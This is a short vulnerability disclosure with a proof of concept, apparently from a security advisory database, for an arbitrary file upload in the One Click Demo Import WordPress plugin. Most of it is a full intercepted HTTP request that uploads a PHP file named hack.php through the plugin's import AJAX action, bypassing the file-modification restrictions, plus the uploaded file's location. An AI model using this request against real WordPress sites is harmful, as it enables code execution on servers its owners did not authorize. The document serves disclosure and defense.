The plugin does not validate the imported file, allowing high privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed
Access Tools > Import > One Click Demo Import > Run Importer and import dummy XML file (can be empty)
Intercept the request made and change the filename as well as content:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------18228892847416541933274753306
Content-Length: 507
Connection: close
Cookie: [admin+]
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="action"
ocdi_upload_manual_import_files
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="security"
e35089cb91
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="content_file"; filename="hack.php"
Content-Type: text/xml
<?php phpinfo();?>
-----------------------------18228892847416541933274753306--
The file will be at https://example.com/wp-content/uploads/<year>/<month>/hack.php